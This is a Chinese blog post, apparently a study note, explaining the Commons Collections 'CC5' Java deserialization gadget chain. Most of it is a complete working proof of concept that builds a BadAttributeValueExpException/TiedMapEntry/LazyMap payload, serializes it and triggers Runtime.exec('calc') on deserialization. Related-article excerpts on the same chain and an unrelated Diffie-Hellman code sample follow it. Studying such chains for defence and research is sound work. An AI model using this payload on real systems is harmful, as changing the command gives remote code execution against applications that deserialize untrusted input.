Java安全--CC5

最新推荐文章于 2023-02-07 09:23:15 发布
最新推荐文章于 2023-02-07 09:23:15 发布
阅读量480 收藏
点赞数 1
分类专栏: Java安全 文章标签: java 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64201116/article/details/128401968
版权

后面确实学了这么多了,觉得能比较看得懂了,直接放一张CC5的调用图吧:

直接从入口来讲吧:

BadAttributeValueExpException.readObject调用了toString,只要把valObj控制为TiedMapEntry就可以走到TiedMapEntry.toString了。即实例化BadAttributeValueExpException的时候传入TiedMapEntry了。

之后TiedMapEntry.toString --> TiedMapEntry.getValue --> LazyMap.get。再往后一路都比较熟悉就不说了。直接贴代码了:

package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class CC5 {
    public static void main(String[] args) throws Exception{
        Transformer[] transformers = {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        HashMap<Object, Object> hashMap = new HashMap<>();
        Map decorate = LazyMap.decorate(hashMap, chainedTransformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(decorate, "key");
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);

        Class<BadAttributeValueExpException> badAttributeValueExpExceptionClass = BadAttributeValueExpException.class;
        Field valField = badAttributeValueExpExceptionClass.getDeclaredField("val");
        valField.setAccessible(true);
        valField.set(badAttributeValueExpException, tiedMapEntry);
        serialize(badAttributeValueExpException);
        unserialize("ser.bin");
    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        objectOutputStream.writeObject(obj);
    }
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename));
        return objectInputStream.readObject();
    }
}

清风--
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java安全学习笔记--反序列化漏洞利用链CC5
m0_64685672的博客
01-22 1237
测试环境 jdk1.8(jdk8u71) Commons Collections4.0 在jdk1.8的时候Annotationinvocation的readObject方法被改写,cc1链就不适用了,cc5链是基于Lazymap类在jdk1.8使用TiedMapEntry+BadAttributeValueExpException来触发LazyMap的get方法。CC1LazyMap链 利用链核心 Transformer[] transformers=new Transforme.
Java反序列化CC5链子学习
chenxiaoyinaida的博客
11-08 319
前言: Apache Commons Collections是一个扩展了Java标准库里的Collection结构的第三方基础库,它提供了很多强有力的数据结构类型并且实现了各种集合工具类。 前几天分析学习了一下CC1链子,今天在pte课余的时候学习了一下CC5链子,发现前半部分基本上和CC1基本链子都基本一致 这里先放一下前面的一段链子: Transformer[] transformers = new Transformer[]{ new Constan...
[Java反序列化]—CommonsCollections5
snowlyzz的博客
11-29 340
CC5分析
Java反序列化 CC5利用链记录
LTianHang的博客
02-07 217
Java反序列化 CC5利用链记录
Javaweb安全——反序列化漏洞-CC&CB链思路整理
weixin_43610673的博客
10-28 2351
如上图所示基本上起点终点就是那几个点然后相互拼接:《Shiro RememberMe 漏洞检测的探索之路》中Koalr师傅已经对CommonsCollections 系列 gadget进行了提纯变成以下四条对命令执行部分的调用分别为InvokerTransformer调用TemplatesImpl对 commons-Collections4 的适配则直接用替换。
Java安全』反序列化-CC5反序列化漏洞POP链分析_ysoserial CommonsCollections5 PoC分析
Ho1aAs‘s Blog
03-12 1013
文章目录前言代码复现工具类PoC代码审计 | 原理分析1. LazyMap.get()调用this.factory.transform()2. TiedMapEntry.toString()调用this.map.get()3. BadAttributeValueExpException反序列化触发this.val.toString()POP链完 前言 由于jdk8修复了AnnotationInvokerHandler,cc1用不了了 cc5在cc1点基础上做了小的改进,还是使用Commons-Collect
greenplum-cc-web-6.8.0-gp6-rhel7-x86_64.zip
09-14
此压缩包"greenplum-cc-web-6.8.0-gp6-rhel7-x86_64.zip"包含的主要组件可能有以下几个部分: 1. **Greenplum数据库服务器**:这是Greenplum的核心部分,负责数据的存储、管理和查询处理。它包含了数据分布、查询...
Java-Text-Adventure:CC和NG CIT 260类的存储库
05-20
Java-Text-Adventure: CC和NG CIT 260类的存储库】 这是一个基于Java的项目,专门设计用于创建文本冒险游戏。"Java-Text-Adventure"是开发者Cragun-Grow-Team为计算机科学与信息技术(CIT)260课程创建的存储库,...
java代码-bbbbbbb
07-15
封装是面向对象的三大特性之一,Java通过访问修饰符(如public、private、protected)实现数据的隐藏,只允许特定部分的代码访问这些数据,提高了代码的安全性。 4. **继承**: 继承是另一个面向对象特性,一个类...
Java CC Payment Library-开源
05-09
Authorize.Net付款网关Java类。 通用类,可用于连接到Authorize.net进行信用卡交易。
声纳java-2
02-13
"声纳Java-2"是一个专注于Java编程语言的软件质量检测工具,主要目的是提升代码的质量和安全性。在软件开发过程中,声纳(SonarQube)是一个广泛应用的平台,它集成了静态代码分析、代码复杂度计算、代码异味检测、...
Java安全—CommonsCollections5
XINO
08-17 576
今天给大家带来的是CC5链的构造分析,也是基本按照CC1走下来的,只是后面的部分不太一样。希望大家有所收获。
11-java安全——java反序列化CC5和CC6链分析
网络安全
07-25 1869
CC5链分析 复习LazyMap利用链: https://blog.csdn.net/qq_35733751/article/details/118462281 在学习CC2链时我们知道由于JDK8版本改写了AnnotationInvocationHandler类的readobject方法,CC1链中LazyMap的get方法已经无法使用,CC5链使用了BadAttributeValueExpException类来代替AnnotationInvocationHandler类,并且还用了一个新的类
java--CommonsCollections5学习
zyer
05-30 246
cc5和cc6差不多,主要都是利用TideMapEntry从而利用LazyMap调用get方法,而LazyMap的get方法需要的参数是LazyMap中没有的值才会触发LazyMap的transform的put方法。 TiedMapEntry 主要使用的是LazyMap的get方法,那么在这里我们可以看到其中getValue,hashCode,equals,toString都可以触发 那么下面我们需要寻找一个可以输入TideMapEntry这个类,并且可以触发这些函数之一的一个类。 BadAtt
java反序列化
m0_51632271的博客
09-05 1402
java反序列化--我的学习思路
Commons Collections4&Commons Collections5
ki10Moc的博客
12-15 418
java安全cc4&cc5
ysoserial CC5利用链分析
weixin_45805993的博客
11-16 490
前两天东华杯没打,看里面签到题用到了 BadAttributeValueExpException.做入口类似的链子,就来学习下同样用了这个类的CC5 Gadget Gadget chain: ObjectInputStream.readObject() BadAttributeValueExpException.readObject() TiedMapEntry.toString() LazyMap.get()
Java安全学习笔记--基于ysoserial反序列化利用工具CC2和CC5链构造方式的思考
m0_64685672的博客
02-02 2536
前言:ysoserial反序列化利用工具的CC5链和CC6链的利用链核心都还是LazyMap+ChainedTransformer,两条利用链通过TideMapEntry的toString和hashCode方法来触发核心利用链,最终触发get方法 把三个方法放一块 public V getValue() { return this.map.get(this.key);//这里的this.map就是我们的LazyMap } //LazyMap的get方法: public V get(Object
JAVA实现diffie-hellman算法
最新发布
05-10
Diffie-Hellman算法是一种密钥交换协议,它可以在不安全的通信信道上协商出一个共享的密钥。下面是用JAVA实现Diffie-Hellman算法的示例代码: ```java import java.math.BigInteger; import java.security.SecureRandom; public class DiffieHellman { private static final BigInteger P = new BigInteger("FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1" + "29024E088A67CC74020BBEA63B139B22514A08798E3404DD" + "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245" + "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED" + "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381" + "FFFFFFFFFFFFFFFF", 16); private static final BigInteger G = BigInteger.valueOf(2); public static void main(String[] args) { // Alice and Bob generate their private keys BigInteger a = generatePrivateKey(); BigInteger b = generatePrivateKey(); // Alice and Bob calculate their public keys BigInteger A = calculatePublicKey(a); BigInteger B = calculatePublicKey(b); // Alice and Bob exchange their public keys BigInteger secretA = calculateSecretKey(a, B); BigInteger secretB = calculateSecretKey(b, A); // Check if the shared secrets are equal if (secretA.equals(secretB)) { System.out.println("Shared secret: " + secretA); } else { System.out.println("Error: shared secrets do not match"); } } private static BigInteger generatePrivateKey() { SecureRandom random = new SecureRandom(); return new BigInteger(256, random); } private static BigInteger calculatePublicKey(BigInteger privateKey) { return G.modPow(privateKey, P); } private static BigInteger calculateSecretKey(BigInteger privateKey, BigInteger publicKey) { return publicKey.modPow(privateKey, P); } } ``` 该示例代码实现了Diffie-Hellman算法的基本步骤: 1. Alice和Bob生成各自的私钥a和b; 2. Alice和Bob分别使用自己的私钥计算出公钥A和B; 3. Alice和Bob交换公钥; 4. Alice使用自己的私钥和Bob的公钥计算出共享密钥; 5. Bob使用自己的私钥和Alice的公钥计算出共享密钥; 6. Alice和Bob比较计算出的共享密钥是否相同,如果相同则表示密钥交换成功。 在实际应用中,需要注意的是,为了保证安全性,需要选择足够大的素数P和生成元G,以及随机的私钥a和b。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值